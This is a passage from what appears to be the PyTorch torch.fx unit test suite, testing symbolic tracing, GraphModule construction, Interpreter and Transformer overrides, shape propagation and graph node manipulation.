class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
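# Tracer(autowrap_functions=...) records the listed callables as call_function
# nodes instead of invoking them on Proxy values, which is why fx_int (a thin
# int() wrapper defined elsewhere in this file) traces here without raising a
# TypeError.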
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
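# While tracing, torch.fx temporarily patches certain builtins (len here) so
# that calls on Proxy values become graph nodes; the assertIs check above
# confirms the original builtin is restored once tracing finishes.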
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
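# The TensorPair/ZeroTensor tests above exercise torch.fx.ProxyableClassMeta:
# constructing such a class from Proxy arguments is recorded as a
# call_function node targeting the class (its __init__ then runs on real
# values at call time), while construction from concrete values proceeds
# normally. That is how the input-dependent branch in ZeroTensor.__init__
# remains traceable here.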
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
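# As exercised above, GraphModule's root argument may also be a dict mapping
# the qualified targets referenced in the Graph to Modules or Tensors; the
# constructor installs them (creating intermediate modules as needed) so that
# accesses like `self.foo.bar.baz` resolve in the generated forward.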
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
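# ShapeProp executes the module on the example input and stores per-node
# tensor metadata (shape, dtype, stride, memory_format) in
# node.meta['tensor_meta']; the layout tests below read back the same
# metadata. Illustrative use:
#
#   shape_prop.ShapeProp(gm).propagate(example_input)
#   metas = {n.name: n.meta.get('tensor_meta') for n in gm.graph.nodes}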
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
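# Interpreter runs a GraphModule node by node in Python. The following tests
# override run_node / call_function / call_method to instrument or rewrite
# execution, and pass initial_env to pre-seed node results (partial
# evaluation). Illustrative override sketch:
#
#   class LoggingInterpreter(Interpreter):
#       def run_node(self, n):
#           result = super().run_node(n)
#           ...  # record n.name, result shape, timing, etc.
#           return result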
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
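# Transformer exposes the same override points as Interpreter but operates on
# Proxy values and returns a new GraphModule from transform(), so the
# sigmoid/neg swap above yields a rewritten graph rather than merely altered
# runtime behavior.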
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertEqual(traced(x, w), f(x, w))
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
